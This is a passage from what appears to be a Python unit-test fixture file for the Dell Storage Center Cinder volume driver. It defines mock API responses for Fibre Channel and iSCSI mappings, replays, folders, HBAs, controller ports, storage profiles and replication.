u'objectType': u'ScServerHbaPath'},
u'controllerPort':
{u'instanceId': u'64702.5764839588723736118.50',
u'instanceName': u'5000D31000FCBE36',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-7640',
u'transport': u'FibreChannel',
u'objectType': u'ScMapping'},
{u'profile': {u'instanceId': u'64702.2941',
u'instanceName': u'6025-47',
u'objectType': u'ScMappingProfile'},
u'status': u'Up',
u'statusMessage': u'',
u'instanceId': u'64702.7638.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'serverHba': {u'instanceId': u'64702.3282218606',
u'instanceName': u'21000024FF30441D',
u'objectType': u'ScServerHba'},
u'path':
{u'instanceId': u'64702.64702.64703.28.76',
u'instanceName': u'21000024FF30441D-5000D31000FCBE3E',
u'objectType': u'ScServerHbaPath'},
u'controllerPort': {u'instanceId':
u'64702.5764839588723736126.60',
u'instanceName': u'5000D31000FCBE3E',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-7638',
u'transport': u'FibreChannel',
u'objectType': u'ScMapping'}]
FC_MAPPINGS_LUN_MISMATCH = \
[{u'profile': {u'instanceId': u'64702.2941',
u'instanceName': u'6025-47',
u'objectType': u'ScMappingProfile'},
u'status': u'Up',
u'statusMessage': u'',
u'instanceId': u'64702.7639.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'serverHba': {u'instanceId': u'64702.3282218607',
u'instanceName': u'21000024FF30441C',
u'objectType': u'ScServerHba'},
u'path': {u'instanceId': u'64702.64702.64703.27.73',
u'instanceName':
u'21000024FF30441C-5000D31000FCBE36',
u'objectType': u'ScServerHbaPath'},
u'controllerPort':
{u'instanceId': u'64702.5764839588723736118.50',
u'instanceName': u'5000D31000FCBE36',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-7639',
u'transport': u'FibreChannel',
u'objectType': u'ScMapping'},
{u'profile': {u'instanceId': u'64702.2941',
u'instanceName': u'6025-47',
u'objectType': u'ScMappingProfile'},
u'status': u'Up',
u'statusMessage': u'',
u'instanceId': u'64702.7640.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume':
{u'instanceId': u'64702.6025',
u'instanceName': u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 1,
u'serverHba': {u'instanceId': u'64702.3282218606',
u'instanceName': u'21000024FF30441D',
u'objectType': u'ScServerHba'},
u'path':
{u'instanceId': u'64702.64702.64703.27.78',
u'instanceName': u'21000024FF30441D-5000D31000FCBE36',
u'objectType': u'ScServerHbaPath'},
u'controllerPort':
{u'instanceId': u'64702.5764839588723736118.50',
u'instanceName': u'5000D31000FCBE36',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-7640',
u'transport': u'FibreChannel',
u'objectType': u'ScMapping'},
{u'profile': {u'instanceId': u'64702.2941',
u'instanceName': u'6025-47',
u'objectType': u'ScMappingProfile'},
u'status': u'Up',
u'statusMessage': u'',
u'instanceId': u'64702.7638.64702',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'volume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'readOnly': False,
u'lun': 2,
u'serverHba': {u'instanceId': u'64702.3282218606',
u'instanceName': u'21000024FF30441D',
u'objectType': u'ScServerHba'},
u'path':
{u'instanceId': u'64702.64702.64703.28.76',
u'instanceName': u'21000024FF30441D-5000D31000FCBE3E',
u'objectType': u'ScServerHbaPath'},
u'controllerPort': {u'instanceId':
u'64702.5764839588723736126.60',
u'instanceName': u'5000D31000FCBE3E',
u'objectType': u'ScControllerPort'},
u'instanceName': u'64702-7638',
u'transport': u'FibreChannel',
u'objectType': u'ScMapping'}]
RPLAY = {u'scSerialNumber': 64702,
u'globalIndex': u'64702-46-250',
u'description': u'Cinder Clone Replay',
u'parent': {u'instanceId': u'64702.46.249',
u'instanceName': u'64702-46-249',
u'objectType': u'ScReplay'},
u'instanceId': u'64702.46.250',
u'scName': u'Storage Center 64702',
u'consistent': False,
u'expires': True,
u'freezeTime': u'12/09/2014 03:52:08 PM',
u'createVolume': {u'instanceId': u'64702.46',
u'instanceName':
u'volume-ff9589d3-2d41-48d5-9ef5-2713a875e85b',
u'objectType': u'ScVolume'},
u'expireTime': u'12/09/2014 04:52:08 PM',
u'source': u'Manual',
u'spaceRecovery': False,
u'writesHeldDuration': 7910,
u'active': False,
u'markedForExpiration': False,
u'objectType': u'ScReplay',
u'instanceName': u'12/09/2014 03:52:08 PM',
u'size': u'0.0 Bytes'
}
RPLAYS = [{u'scSerialNumber': 64702,
u'globalIndex': u'64702-6025-5',
u'description': u'Manually Created',
u'parent': {u'instanceId': u'64702.6025.4',
u'instanceName': u'64702-6025-4',
u'objectType': u'ScReplay'},
u'instanceId': u'64702.6025.5',
u'scName': u'Storage Center 64702',
u'consistent': False,
u'expires': True,
u'freezeTime': u'02/02/2015 08:23:55 PM',
u'createVolume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'expireTime': u'02/02/2015 09:23:55 PM',
u'source': u'Manual',
u'spaceRecovery': False,
u'writesHeldDuration': 7889,
u'active': False,
u'markedForExpiration': False,
u'objectType': u'ScReplay',
u'instanceName': u'02/02/2015 08:23:55 PM',
u'size': u'0.0 Bytes'},
{u'scSerialNumber': 64702,
u'globalIndex': u'64702-6025-4',
u'description': u'Cinder Test Replay012345678910',
u'parent': {u'instanceId': u'64702.6025.3',
u'instanceName': u'64702-6025-3',
u'objectType': u'ScReplay'},
u'instanceId': u'64702.6025.4',
u'scName': u'Storage Center 64702',
u'consistent': False,
u'expires': True,
u'freezeTime': u'02/02/2015 08:23:47 PM',
u'createVolume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'expireTime': u'02/02/2015 09:23:47 PM',
u'source': u'Manual',
u'spaceRecovery': False,
u'writesHeldDuration': 7869,
u'active': False,
u'markedForExpiration': False,
u'objectType': u'ScReplay',
u'instanceName': u'02/02/2015 08:23:47 PM',
u'size': u'0.0 Bytes'}]
TST_RPLAY = {u'scSerialNumber': 64702,
u'globalIndex': u'64702-6025-4',
u'description': u'Cinder Test Replay012345678910',
u'parent': {u'instanceId': u'64702.6025.3',
u'instanceName': u'64702-6025-3',
u'objectType': u'ScReplay'},
u'instanceId': u'64702.6025.4',
u'scName': u'Storage Center 64702',
u'consistent': False,
u'expires': True,
u'freezeTime': u'02/02/2015 08:23:47 PM',
u'createVolume': {u'instanceId': u'64702.6025',
u'instanceName':
u'Server_21000024ff30441d Test Vol',
u'objectType': u'ScVolume'},
u'expireTime': u'02/02/2015 09:23:47 PM',
u'source': u'Manual',
u'spaceRecovery': False,
u'writesHeldDuration': 7869,
u'active': False,
u'markedForExpiration': False,
u'objectType': u'ScReplay',
u'instanceName': u'02/02/2015 08:23:47 PM',
u'size': u'0.0 Bytes'}
FLDR = {u'status': u'Up',
u'instanceName': u'opnstktst',
u'name': u'opnstktst',
u'parent':
{u'instanceId': u'64702.0',
u'instanceName': u'Volumes',
u'objectType': u'ScVolumeFolder'},
u'instanceId': u'64702.43',
u'scName': u'Storage Center 64702',
u'notes': u'Folder for OpenStack Cinder Driver',
u'scSerialNumber': 64702,
u'parentIndex': 0,
u'okToDelete': True,
u'folderPath': u'',
u'root': False,
u'statusMessage': u'',
u'objectType': u'ScVolumeFolder'}
SVR_FLDR = {u'status': u'Up',
u'instanceName': u'devstacksrv',
u'name': u'devstacksrv',
u'parent': {u'instanceId': u'64702.0',
u'instanceName': u'Servers',
u'objectType': u'ScServerFolder'},
u'instanceId': u'64702.4',
u'scName': u'Storage Center 64702',
u'notes': u'Folder for OpenStack Cinder Driver',
u'scSerialNumber': 64702,
u'parentIndex': 0,
u'okToDelete': False,
u'folderPath': u'',
u'root': False,
u'statusMessage': u'',
u'objectType': u'ScServerFolder'}
ISCSI_HBA = {u'portWwnList': [],
u'iscsiIpAddress': u'0.0.0.0',
u'pathCount': 1,
u'name': u'iqn.1993-08.org.debian:01:52332b70525',
u'connectivity': u'Down',
u'instanceId': u'64702.3786433166',
u'scName': u'Storage Center 64702',
u'notes': u'',
u'scSerialNumber': 64702,
u'server':
{u'instanceId': u'64702.38',
u'instanceName':
u'Server_iqn.1993-08.org.debian:01:52332b70525',
u'objectType': u'ScPhysicalServer'},
u'remoteStorageCenter': False,
u'iscsiName': u'',
u'portType': u'Iscsi',
u'instanceName': u'iqn.1993-08.org.debian:01:52332b70525',
u'objectType': u'ScServerHba'}
FC_HBAS = [{u'portWwnList': [],
u'iscsiIpAddress': u'0.0.0.0',
u'pathCount': 2,
u'name': u'21000024FF30441C',
u'connectivity': u'Up',
u'instanceId': u'64702.3282218607',
u'scName': u'Storage Center 64702',
u'notes': u'',
u'scSerialNumber': 64702,
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'remoteStorageCenter': False,
u'iscsiName': u'',
u'portType': u'FibreChannel',
u'instanceName': u'21000024FF30441C',
u'objectType': u'ScServerHba'},
{u'portWwnList': [],
u'iscsiIpAddress': u'0.0.0.0',
u'pathCount': 3,
u'name': u'21000024FF30441D',
u'connectivity': u'Partial',
u'instanceId': u'64702.3282218606',
u'scName': u'Storage Center 64702',
u'notes': u'',
u'scSerialNumber': 64702,
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'remoteStorageCenter': False,
u'iscsiName': u'',
u'portType': u'FibreChannel',
u'instanceName': u'21000024FF30441D',
u'objectType': u'ScServerHba'}]
FC_HBA = {u'portWwnList': [],
u'iscsiIpAddress': u'0.0.0.0',
u'pathCount': 3,
u'name': u'21000024FF30441D',
u'connectivity': u'Partial',
u'instanceId': u'64702.3282218606',
u'scName': u'Storage Center 64702',
u'notes': u'',
u'scSerialNumber': 64702,
u'server': {u'instanceId': u'64702.47',
u'instanceName': u'Server_21000024ff30441d',
u'objectType': u'ScPhysicalServer'},
u'remoteStorageCenter': False,
u'iscsiName': u'',
u'portType': u'FibreChannel',
u'instanceName': u'21000024FF30441D',
u'objectType': u'ScServerHba'}
SVR_OS_S = [{u'allowsLunGaps': True,
u'product': u'Red Hat Linux',
u'supportsActiveMappingDeletion': True,
u'version': u'6.x',
u'requiresLunZero': False,
u'scName': u'Storage Center 64702',
u'virtualMachineGuest': True,
u'virtualMachineHost': False,
u'allowsCrossTransportMapping': False,
u'objectType': u'ScServerOperatingSystem',
u'instanceId': u'64702.38',
u'lunCanVaryAcrossPaths': False,
u'scSerialNumber': 64702,
u'maximumVolumeSize': u'0.0 Bytes',
u'multipath': True,
u'instanceName': u'Red Hat Linux 6.x',
u'supportsActiveMappingCreation': True,
u'name': u'Red Hat Linux 6.x'}]
ISCSI_FLT_DOMAINS = [{u'headerDigestEnabled': False,
u'classOfServicePriority': 0,
u'wellKnownIpAddress': u'192.168.0.21',
u'scSerialNumber': 64702,
u'iscsiName':
u'iqn.2002-03.com.compellent:5000d31000fcbe42',
u'portNumber': 3260,
u'subnetMask': u'255.255.255.0',
u'gateway': u'192.168.0.1',
u'objectType': u'ScIscsiFaultDomain',
u'chapEnabled': False,
u'instanceId': u'64702.6.5.3',
u'childStatus': u'Up',
u'defaultTimeToRetain': u'SECONDS_20',
u'dataDigestEnabled': False,
u'instanceName': u'iSCSI 10G 2',
u'statusMessage': u'',
u'status': u'Up',
u'transportType': u'Iscsi',
u'vlanId': 0,
u'windowSize': u'131072.0 Bytes',
u'defaultTimeToWait': u'SECONDS_2',
u'scsiCommandTimeout': u'MINUTES_1',
u'deleteAllowed': False,
u'name': u'iSCSI 10G 2',
u'immediateDataWriteEnabled': False,
u'scName': u'Storage Center 64702',
u'notes': u'',
u'mtu': u'MTU_1500',
u'bidirectionalChapSecret': u'',
u'keepAliveTimeout': u'SECONDS_30'}]
# For testing find_iscsi_properties where multiple portals are found
ISCSI_FLT_DOMAINS_MULTI_PORTALS = \
[{u'headerDigestEnabled': False,
u'classOfServicePriority': 0,
u'wellKnownIpAddress': u'192.168.0.21',
u'scSerialNumber': 64702,
u'iscsiName':
u'iqn.2002-03.com.compellent:5000d31000fcbe42',
u'portNumber': 3260,
u'subnetMask': u'255.255.255.0',
u'gateway': u'192.168.0.1',
u'objectType': u'ScIscsiFaultDomain',
u'chapEnabled': False,
u'instanceId': u'64702.6.5.3',
u'childStatus': u'Up',
u'defaultTimeToRetain': u'SECONDS_20',
u'dataDigestEnabled': False,
u'instanceName': u'iSCSI 10G 2',
u'statusMessage': u'',
u'status': u'Up',
u'transportType': u'Iscsi',
u'vlanId': 0,
u'windowSize': u'131072.0 Bytes',
u'defaultTimeToWait': u'SECONDS_2',
u'scsiCommandTimeout': u'MINUTES_1',
u'deleteAllowed': False,
u'name': u'iSCSI 10G 2',
u'immediateDataWriteEnabled': False,
u'scName': u'Storage Center 64702',
u'notes': u'',
u'mtu': u'MTU_1500',
u'bidirectionalChapSecret': u'',
u'keepAliveTimeout': u'SECONDS_30'},
{u'headerDigestEnabled': False,
u'classOfServicePriority': 0,
u'wellKnownIpAddress': u'192.168.0.25',
u'scSerialNumber': 64702,
u'iscsiName':
u'iqn.2002-03.com.compellent:5000d31000fcbe42',
u'portNumber': 3260,
u'subnetMask': u'255.255.255.0',
u'gateway': u'192.168.0.1',
u'objectType': u'ScIscsiFaultDomain',
u'chapEnabled': False,
u'instanceId': u'64702.6.5.3',
u'childStatus': u'Up',
u'defaultTimeToRetain': u'SECONDS_20',
u'dataDigestEnabled': False,
u'instanceName': u'iSCSI 10G 2',
u'statusMessage': u'',
u'status': u'Up',
u'transportType': u'Iscsi',
u'vlanId': 0,
u'windowSize': u'131072.0 Bytes',
u'defaultTimeToWait': u'SECONDS_2',
u'scsiCommandTimeout': u'MINUTES_1',
u'deleteAllowed': False,
u'name': u'iSCSI 10G 2',
u'immediateDataWriteEnabled': False,
u'scName': u'Storage Center 64702',
u'notes': u'',
u'mtu': u'MTU_1500',
u'bidirectionalChapSecret': u'',
u'keepAliveTimeout': u'SECONDS_30'}]
ISCSI_FLT_DOMAIN = {u'headerDigestEnabled': False,
u'classOfServicePriority': 0,
u'wellKnownIpAddress': u'192.168.0.21',
u'scSerialNumber': 64702,
u'iscsiName':
u'iqn.2002-03.com.compellent:5000d31000fcbe42',
u'portNumber': 3260,
u'subnetMask': u'255.255.255.0',
u'gateway': u'192.168.0.1',
u'objectType': u'ScIscsiFaultDomain',
u'chapEnabled': False,
u'instanceId': u'64702.6.5.3',
u'childStatus': u'Up',
u'defaultTimeToRetain': u'SECONDS_20',
u'dataDigestEnabled': False,
u'instanceName': u'iSCSI 10G 2',
u'statusMessage': u'',
u'status': u'Up',
u'transportType': u'Iscsi',
u'vlanId': 0,
u'windowSize': u'131072.0 Bytes',
u'defaultTimeToWait': u'SECONDS_2',
u'scsiCommandTimeout': u'MINUTES_1',
u'deleteAllowed': False,
u'name': u'iSCSI 10G 2',
u'immediateDataWriteEnabled': False,
u'scName': u'Storage Center 64702',
u'notes': u'',
u'mtu': u'MTU_1500',
u'bidirectionalChapSecret': u'',
u'keepAliveTimeout': u'SECONDS_30'}
CTRLR_PORT = {u'status': u'Up',
u'iscsiIpAddress': u'0.0.0.0',
u'WWN': u'5000D31000FCBE06',
u'name': u'5000D31000FCBE06',
u'iscsiGateway': u'0.0.0.0',
u'instanceId': u'64702.5764839588723736070.51',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'transportType': u'FibreChannel',
u'virtual': False,
u'controller': {u'instanceId': u'64702.64702',
u'instanceName': u'SN 64702',
u'objectType': u'ScController'},
u'iscsiName': u'',
u'purpose': u'FrontEnd',
u'iscsiSubnetMask': u'0.0.0.0',
u'faultDomain':
{u'instanceId': u'64702.4.3',
u'instanceName': u'Domain 1',
u'objectType': u'ScControllerPortFaultDomain'},
u'instanceName': u'5000D31000FCBE06',
u'statusMessage': u'',
u'objectType': u'ScControllerPort'}
ISCSI_CTRLR_PORT = {u'preferredParent':
{u'instanceId': u'64702.5764839588723736074.69',
u'instanceName': u'5000D31000FCBE0A',
u'objectType': u'ScControllerPort'},
u'status': u'Up',
u'iscsiIpAddress': u'10.23.8.235',
u'WWN': u'5000D31000FCBE43',
u'name': u'5000D31000FCBE43',
u'parent':
{u'instanceId': u'64702.5764839588723736074.69',
u'instanceName': u'5000D31000FCBE0A',
u'objectType': u'ScControllerPort'},
u'iscsiGateway': u'0.0.0.0',
u'instanceId': u'64702.5764839588723736131.91',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'transportType': u'Iscsi',
u'virtual': True,
u'controller': {u'instanceId': u'64702.64702',
u'instanceName': u'SN 64702',
u'objectType': u'ScController'},
u'iscsiName':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
u'purpose': u'FrontEnd',
u'iscsiSubnetMask': u'0.0.0.0',
u'faultDomain':
{u'instanceId': u'64702.6.5',
u'instanceName': u'iSCSI 10G 2',
u'objectType': u'ScControllerPortFaultDomain'},
u'instanceName': u'5000D31000FCBE43',
u'childStatus': u'Up',
u'statusMessage': u'',
u'objectType': u'ScControllerPort'}
FC_CTRLR_PORT = {u'preferredParent':
{u'instanceId': u'64702.5764839588723736093.57',
u'instanceName': u'5000D31000FCBE1D',
u'objectType': u'ScControllerPort'},
u'status': u'Up',
u'iscsiIpAddress': u'0.0.0.0',
u'WWN': u'5000D31000FCBE36',
u'name': u'5000D31000FCBE36',
u'parent':
{u'instanceId': u'64702.5764839588723736093.57',
u'instanceName': u'5000D31000FCBE1D',
u'objectType': u'ScControllerPort'},
u'iscsiGateway': u'0.0.0.0',
u'instanceId': u'64702.5764839588723736118.50',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'transportType': u'FibreChannel',
u'virtual': True,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'iscsiName': u'',
u'purpose': u'FrontEnd',
u'iscsiSubnetMask': u'0.0.0.0',
u'faultDomain':
{u'instanceId': u'64702.1.0',
u'instanceName': u'Domain 0',
u'objectType': u'ScControllerPortFaultDomain'},
u'instanceName': u'5000D31000FCBE36',
u'childStatus': u'Up',
u'statusMessage': u'',
u'objectType': u'ScControllerPort'}
FC_CTRLR_PORT_WWN_ERROR = \
{u'preferredParent':
{u'instanceId': u'64702.5764839588723736093.57',
u'instanceName': u'5000D31000FCBE1D',
u'objectType': u'ScControllerPort'},
u'status': u'Up',
u'iscsiIpAddress': u'0.0.0.0',
u'Wwn': u'5000D31000FCBE36',
u'name': u'5000D31000FCBE36',
u'parent':
{u'instanceId': u'64702.5764839588723736093.57',
u'instanceName': u'5000D31000FCBE1D',
u'objectType': u'ScControllerPort'},
u'iscsiGateway': u'0.0.0.0',
u'instanceId': u'64702.5764839588723736118.50',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'transportType': u'FibreChannel',
u'virtual': True,
u'controller': {u'instanceId': u'64702.64703',
u'instanceName': u'SN 64703',
u'objectType': u'ScController'},
u'iscsiName': u'',
u'purpose': u'FrontEnd',
u'iscsiSubnetMask': u'0.0.0.0',
u'faultDomain':
{u'instanceId': u'64702.1.0',
u'instanceName': u'Domain 0',
u'objectType': u'ScControllerPortFaultDomain'},
u'instanceName': u'5000D31000FCBE36',
u'childStatus': u'Up',
u'statusMessage': u'',
u'objectType': u'ScControllerPort'}
STRG_USAGE = {u'systemSpace': u'7.38197504E8 Bytes',
u'freeSpace': u'1.297659461632E13 Bytes',
u'oversubscribedSpace': u'0.0 Bytes',
u'instanceId': u'64702',
u'scName': u'Storage Center 64702',
u'savingVsRaidTen': u'1.13737990144E11 Bytes',
u'allocatedSpace': u'1.66791217152E12 Bytes',
u'usedSpace': u'3.25716017152E11 Bytes',
u'configuredSpace': u'9.155796533248E12 Bytes',
u'alertThresholdSpace': u'1.197207956992E13 Bytes',
u'availableSpace': u'1.3302310633472E13 Bytes',
u'badSpace': u'0.0 Bytes',
u'time': u'02/02/2015 02:23:39 PM',
u'scSerialNumber': 64702,
u'instanceName': u'Storage Center 64702',
u'storageAlertThreshold': 10,
u'objectType': u'StorageCenterStorageUsage'}
RPLAY_PROFILE = {u'name': u'fc8f2fec-fab2-4e34-9148-c094c913b9a3',
u'type': u'Consistent',
u'notes': u'Created by Dell Cinder Driver',
u'volumeCount': 0,
u'expireIncompleteReplaySets': True,
u'replayCreationTimeout': 20,
u'enforceReplayCreationTimeout': False,
u'ruleCount': 0,
u'userCreated': True,
u'scSerialNumber': 64702,
u'scName': u'Storage Center 64702',
u'objectType': u'ScReplayProfile',
u'instanceId': u'64702.11',
u'instanceName': u'fc8f2fec-fab2-4e34-9148-c094c913b9a3'}
STORAGE_PROFILE_LIST = [
{u'allowedForFlashOptimized': False,
u'allowedForNonFlashOptimized': True,
u'index': 1,
u'instanceId': u'64158.1',
u'instanceName': u'Recommended',
u'name': u'Recommended',
u'notes': u'',
u'objectType': u'ScStorageProfile',
u'raidTypeDescription': u'RAID 10 Active, RAID 5 or RAID 6 Replay',
u'raidTypeUsed': u'Mixed',
u'scName': u'Storage Center 64158',
u'scSerialNumber': 64158,
u'tiersUsedDescription': u'Tier 1, Tier 2, Tier 3',
u'useTier1Storage': True,
u'useTier2Storage': True,
u'useTier3Storage': True,
u'userCreated': False,
u'volumeCount': 125},
{u'allowedForFlashOptimized': False,
u'allowedForNonFlashOptimized': True,
u'index': 2,
u'instanceId': u'64158.2',
u'instanceName': u'High Priority',
u'name': u'High Priority',
u'notes': u'',
u'objectType': u'ScStorageProfile',
u'raidTypeDescription': u'RAID 10 Active, RAID 5 or RAID 6 Replay',
u'raidTypeUsed': u'Mixed',
u'scName': u'Storage Center 64158',
u'scSerialNumber': 64158,
u'tiersUsedDescription': u'Tier 1',
u'useTier1Storage': True,
u'useTier2Storage': False,
u'useTier3Storage': False,
u'userCreated': False,
u'volumeCount': 0},
{u'allowedForFlashOptimized': False,
u'allowedForNonFlashOptimized': True,
u'index': 3,
u'instanceId': u'64158.3',
u'instanceName': u'Medium Priority',
u'name': u'Medium Priority',
u'notes': u'',
u'objectType': u'ScStorageProfile',
u'raidTypeDescription': u'RAID 10 Active, RAID 5 or RAID 6 Replay',
u'raidTypeUsed': u'Mixed',
u'scName': u'Storage Center 64158',
u'scSerialNumber': 64158,
u'tiersUsedDescription': u'Tier 2',
u'useTier1Storage': False,
u'useTier2Storage': True,
u'useTier3Storage': False,
u'userCreated': False,
u'volumeCount': 0},
{u'allowedForFlashOptimized': True,
u'allowedForNonFlashOptimized': True,
u'index': 4,
u'instanceId': u'64158.4',
u'instanceName': u'Low Priority',
u'name': u'Low Priority',
u'notes': u'',
u'objectType': u'ScStorageProfile',
u'raidTypeDescription': u'RAID 10 Active, RAID 5 or RAID 6 Replay',
u'raidTypeUsed': u'Mixed',
u'scName': u'Storage Center 64158',
u'scSerialNumber': 64158,
u'tiersUsedDescription': u'Tier 3',
u'useTier1Storage': False,
u'useTier2Storage': False,
u'useTier3Storage': True,
u'userCreated': False,
u'volumeCount': 0}]
CGS = [{u'profile':
{u'instanceId': u'65690.4',
u'instanceName': u'0869559e-6881-454e-ba18-15c6726d33c1',
u'objectType': u'ScReplayProfile'},
u'scSerialNumber': 65690,
u'globalIndex': u'65690-4-2',
u'description': u'GUID1-0869559e-6881-454e-ba18-15c6726d33c1',
u'instanceId': u'65690.65690.4.2',
u'scName': u'Storage Center 65690',
u'expires': False,
u'freezeTime': u'2015-09-28T14:00:59-05:00',
u'expireTime': u'1969-12-31T18:00:00-06:00',
u'expectedReplayCount': 2,
u'writesHeldDuration': 19809,
u'replayCount': 2,
u'instanceName': u'Name1',
u'objectType': u'ScReplayConsistencyGroup'},
{u'profile':
{u'instanceId': u'65690.4',
u'instanceName': u'0869559e-6881-454e-ba18-15c6726d33c1',
u'objectType': u'ScReplayProfile'},
u'scSerialNumber': 65690,
u'globalIndex': u'65690-4-3',
u'description': u'GUID2-0869559e-6881-454e-ba18-15c6726d33c1',
u'instanceId': u'65690.65690.4.3',
u'scName': u'Storage Center 65690',
u'expires': False,
u'freezeTime': u'2015-09-28T14:00:59-05:00',
u'expireTime': u'1969-12-31T18:00:00-06:00',
u'expectedReplayCount': 2,
u'writesHeldDuration': 19809,
u'replayCount': 2,
u'instanceName': u'Name2',
u'objectType': u'ScReplayConsistencyGroup'}
]
ISCSI_CONFIG = {
u'initialReadyToTransfer': True,
u'scSerialNumber': 64065,
u'macAddress': u'00c0dd-1da173',
u'instanceId': u'64065.5764839588723573038.6',
u'vlanTagging': False,
u'mapCount': 8,
u'cardModel': u'Qle4062',
u'portNumber': 3260,
u'firstBurstSize': 256,
u'deviceName': u'PCIDEV09',
u'subnetMask': u'255.255.255.0',
u'speed': u'1 Gbps',
u'maximumVlanCount': 0,
u'gatewayIpAddress': u'192.168.0.1',
u'slot': 4,
u'sfpData': u'',
u'dataDigest': False,
u'chapEnabled': False,
u'firmwareVersion': u'03.00.01.77',
u'preferredControllerIndex': 64066,
u'defaultTimeToRetain': 20,
u'objectType': u'ScControllerPortIscsiConfiguration',
u'instanceName': u'5000d31000FCBE43',
u'scName': u'sc64065',
u'revision': u'0',
u'controllerPortIndex': 5764839588723573038,
u'maxBurstSize': 512,
u'targetCount': 20,
u'description': u'QLogic QLE4062 iSCSI Adapter Rev 0 Copper',
u'vlanSupported': True,
u'chapName': u'iqn.2002-03.com.compellent:5000d31000fcbe43',
u'windowSize': 128,
u'vlanId': 0,
u'defaultTimeToWait': 2,
u'headerDigest': False,
u'slotPort': 2,
u'immediateDataWrite': False,
u'storageCenterTargetCount': 20,
u'vlanCount': 0,
u'scsiCommandTimeout': 60,
u'slotType': u'PCI4',
u'ipAddress': u'192.168.0.21',
u'vlanUserPriority': 0,
u'bothCount': 0,
u'initiatorCount': 33,
u'keepAliveTimeout': 30,
u'homeControllerIndex': 64066,
u'chapSecret': u'',
u'maximumTransmissionUnit': 1500}
SCQOS = {u'linkSpeed': u'1 Gbps',
u'numberDevices': 1,
u'bandwidthLimited': False,
u'name': u'Cinder QoS',
u'instanceId': u'64702.2',
u'scName': u'Storage Center 64702',
u'scSerialNumber': 64702,
u'instanceName': u'Cinder QoS',
u'advancedSettings': {u'globalMaxSectorPerIo': 512,
u'destinationMaxSectorCount': 65536,
u'queuePassMaxSectorCount': 65536,
u'destinationMaxIoCount': 18,
u'globalMaxIoCount': 32,
u'queuePassMaxIoCount': 8},
u'objectType': u'ScReplicationQosNode'}
SCREPL = [{u'destinationVolume': {u'instanceId': u'65495.167',
u'instanceName': u'Cinder repl of abcd9'
u'5b2-1284-4cf0-a397-9'
u'70fa6c68092',
u'objectType': u'ScVolume'},
u'instanceId': u'64702.9',
u'scSerialNumber': 64702,
u'syncStatus': u'NotApplicable',
u'objectType': u'ScReplication',
u'sourceStorageCenter': {u'instanceId': u'64702',
u'instanceName': u'Storage Center '
'64702',
u'objectType': u'StorageCenter'},
u'secondaryTransportTypes': [],
u'dedup': False,
u'state': u'Up',
u'replicateActiveReplay': False,
u'qosNode': {u'instanceId': u'64702.2',
u'instanceName': u'Cinder QoS',
u'objectType': u'ScReplicationQosNode'},
u'sourceVolume': {u'instanceId': u'64702.13108',
u'instanceName': u'abcd95b2-1284-4cf0-a397-'
u'970fa6c68092',
u'objectType': u'ScVolume'},
u'type': u'Asynchronous',
u'statusMessage': u'',
u'status': u'Up',
u'syncMode': u'None',
u'stateMessage': u'',
u'managedByLiveVolume': False,
u'destinationScSerialNumber': 65495,
u'pauseAllowed': True,
u'instanceName': u"Replication of 'abcd95b2-1284-4cf0-"
u"a397-970fa6c68092'",
u'simulation': False,
u'transportTypes': [u'FibreChannel'],
u'replicateStorageToLowestTier': True,
u'scName': u'Storage Center 64702',
u'destinationStorageCenter': {u'instanceId': u'65495',
u'instanceName': u'Storage Center'
u' 65495',
u'objectType': u'StorageCenter'}}]
IQN = 'iqn.2002-03.com.compellent:5000D31000000001'
WWN = u'21000024FF30441C'
WWNS = [u'21000024FF30441C',
u'21000024FF30441D']
# Used to test finding no match in find_wwns
WWNS_NO_MATCH = [u'21000024FF30451C',
u'21000024FF30451D']
FLDR_PATH = 'StorageCenter/ScVolumeFolder/'
# Create a Response object that indicates OK
response_ok = models.Response()
response_ok.status_code = 200
response_ok.reason = u'ok'
